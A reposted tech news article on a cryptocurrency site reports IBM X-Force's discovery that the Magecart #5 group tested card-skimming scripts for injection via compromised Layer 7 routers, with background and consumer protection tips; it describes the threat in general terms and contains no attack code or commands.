Hackers looking into injecting card stealing code on routers, rather then websites

server rack vpn router switch

Security researchers at IBM have found evidence that hackers have been working on creating malicious scripts they can deploy on commercial-grade “Layer 7” routers to steal payment card details.

This discovery is a game-changer in what researchers call Magecart attacks, also known as web skimming. These are attacks where hackers plant malicious code on an online store that records and steals payment card details.

Until now, Magecart-specific code was only delivered at the website level, hidden inside JavaScript or PHP files. However, this new discovery is an escalation of Magecart attacks to a new level, where the malicious code is injected at the router level, rather than being added by hackers on outdated websites.

What are L7 routers

Layer 7, or L7, routers are a type of commercial, heavy-duty router that’s usually installed on large networks, such as hotels, malls, airports, casinos, government networks, public spaces, and others.

They work like any other router, except with the added benefit of being able to manipulate traffic at the seventh layer (application level) of the OSI networking model — meaning they can react to traffic based on more than just IP addresses, such as cookies, domain names, browser types, and more.

In a report published today, researchers with the IBM X-Force Incident Response and Intelligence Services (IRIS) team said they found evidence that a well-known hacker group has been testing Magecart scripts to deploy on L7 routers.

The idea is that hackers would compromise L7 routers and then use their powerful traffic manipulation features to inject these malicious scripts in users’ active browsers sessions.

IBM IRIS researchers said the scripts they found were specifically designed to extract payment card data from online shops, and upload the stolen information to a remote web server.

Researchers said they found these scripts after the hackers uploaded the files on VirusTotal, a web-based antivirus aggregator. The hackers appear to have been testing if their code would be detected by the antivirus engines part of the VirusTotal aggregator.

In total, IBM IRIS researchers found 17 scripts, which they organized in five groups, based on their purpose.

magecart-on-routers.png

magecart-on-routers.png

Image: IBM IRIS

Well-known hacking group behind the “router file tests”

Researchers said that domains and other indicators in the code linked the 17 files to a known hacker group known as Magecart #5.

This is a known threat actor that has engaged in hacking IT companies and planting card-stealing code in their products. They also used CDNs (content delivery networks) and ads to deliver the malicious code.

These types of attacks are called web skimming, or Magecart attacks, and have been going on for at least three years, but they became a popular trend in the past year. A RiskIQ report published last year delved deeper into Magecart attacks.

Yonathan Klijnsma, Head of Threat Research at RiskIQ, said that Magecart group #5 is one of the most sophisticated of all the Magecart groups his company has tracked.

In its 2018 report, RiskIQ identified 12 Magecart groups, but IBM said it’s now tracking 38 such entities.

Unclear if the “test files” are now used in the real world

IBM IRIS researchers said the Magecart group #5 test scripts they found were uploaded on VirusTotal between April 11 and April 14.

It is unclear if hackers deployed the scripts on real-world routers, but the chances are that they did.

IBM IRIS noted that, historically, the Magecart #5 group has been active in stealing payment card data entered in the checkout forms of selected US and Chinese online stores. These may also be the stores they’ll target if they deploy their malicious scripts on routers.

From a user perspective, there’s not that much that victims can do to prevent from a Magecart attack executed at the router level, except avoid shopping online from untrusted or public networks, such as those in hotels, airports, or malls.

However, when shopping from home, users are still exposed to Magecart attacks that rely on inserting malicious code at the website level.

But there may be one solution. In recent months, responding to the rise in Magecart (web skimming) attacks, security researchers have begun recommending using a “virtual card” service, where users get a one-time payment card number they can use for one transaction only.

Even if the card number is used on a compromised site, once the transaction is completed, the card number becomes useless for hackers afterward. The downside is that “virtual card” services aren’t always available in all countries around the globe, and not all users will be able to get one.

Magecart attacks evolving towards injections of malicious code at the router level aren’t actually a surprise for most security experts. Insecure routers have been hacked in the past decade before, usually to redirect users to phishing links, malicious downloads, to inject cryptojacking scripts, or to inject ads for criminals’ profits. It was only a matter of time until Magecart groups realized they could do the same, but insert card-stealing code instead of what previous groups have used in the past.

Hackers looking into injecting card stealing code on routers, rather then websites 1
About the author

E-Crypto News was developed to assist all cryptocurrency investors in developing profitable cryptocurrency portfolios through the provision of timely and much-needed information. Investments in cryptocurrency require a level of detail, sensitivity, and accuracy that isn’t required in any other market and as such, we’ve developed our databases to help fill in information gaps.

Related Posts

E-Crypto News Executive Interviews



bitcoin
Bitcoin (BTC) $ 42,769.00
ethereum
Ethereum (ETH) $ 2,931.17
cardano
Cardano (ADA) $ 2.36
tether
Tether (USDT) $ 1.00
binance-coin
Binance Coin (BNB) $ 356.98
xrp
XRP (XRP) $ 0.949874
solana
Solana (SOL) $ 142.34
polkadot
Polkadot (DOT) $ 31.13
usd-coin
USD Coin (USDC) $ 1.00
dogecoin
Dogecoin (DOGE) $ 0.210893
USD
EUR
GBP
bitcoinBitcoin (BTC)
$ 42,769.00
ethereumEthereum (ETH)
$ 2,931.17
tetherTether (USDT)
$ 1.00
bitcoin-cashBitcoin Cash (BCH)
$ 519.60
litecoinLitecoin (LTC)
$ 154.18
bitcoinBitcoin (BTC)
36.506,34
ethereumEthereum (ETH)
2.501,96
tetherTether (USDT)
0,853570
bitcoin-cashBitcoin Cash (BCH)
443,51
litecoinLitecoin (LTC)
131,60
bitcoinBitcoin (BTC)
31,321.88
ethereumEthereum (ETH)
2,146.64
tetherTether (USDT)
0.73235
bitcoin-cashBitcoin Cash (BCH)
380.53
litecoinLitecoin (LTC)
112.91

Automated trading with HaasBot Crypto Trading Bots

Crypto Scams

Crypto Scams
Crypto Scams Still Persistent In 2021, SEC Warns About Red Flags To Watch
September 9, 2021
Poly Network
Here’s How Hackers Stole Over $600 million in the Poly Network Attack
August 12, 2021
The World’s Most Infamous Crypto Hacks and Scams
July 31, 2021
Cryptocurrency Exchanges
Cryptocurrency Exchanges and the Plague of Scams and Bans
June 29, 2021
What Role Do Cryptocurrencies Play In The Era Of Ransomware Attacks?
June 9, 2021

Blockchain/Cryptocurrency Questions and Answers

Beginner’s Guide to Investing in Cryptocurrency
August 9, 2021
Short-Sell Cryptocurrency
How to Short-Sell Cryptocurrency: A Brief Overview
July 17, 2021
Klaytn
What Is Klaytn (KLAY) And How Does It Work?
July 16, 2021
Cryptocurrencies
Our Crypto Roundup Interview Asks- Do Cryptocurrencies Have a Future?
July 15, 2021
Solana
What Is Solana (SOL) And How Does It Work?
June 26, 2021


CryptoCurrencyUSDChange 1hChange 24hChange 7d
Bitcoin42,466 0.96 % 5.49 % 10.08 %
Ethereum2,907.5 1.05 % 6.22 % 14.79 %
Cardano2.330 1.48 % 0.68 % 0.90 %
Tether0.9986 0.03 % 0.08 % 0.23 %
Binance Coin353.43 1.38 % 6.60 % 12.93 %
XRP0.9430 1.07 % 4.61 % 11.67 %
Solana140.83 1.26 % 3.31 % 4.58 %
Polkadot30.87 2.19 % 17.29 % 10.73 %
USD Coin1.000 0.40 % 0.14 % 0.13 %
Dogecoin0.2090 1.28 % 5.87 % 13.26 %

bitcoin
Bitcoin (BTC) $ 42,769.00
ethereum
Ethereum (ETH) $ 2,931.17
cardano
Cardano (ADA) $ 2.36
tether
Tether (USDT) $ 1.00
binance-coin
Binance Coin (BNB) $ 356.98
xrp
XRP (XRP) $ 0.949874
solana
Solana (SOL) $ 142.34
polkadot
Polkadot (DOT) $ 31.13
usd-coin
USD Coin (USDC) $ 1.00
dogecoin
Dogecoin (DOGE) $ 0.210893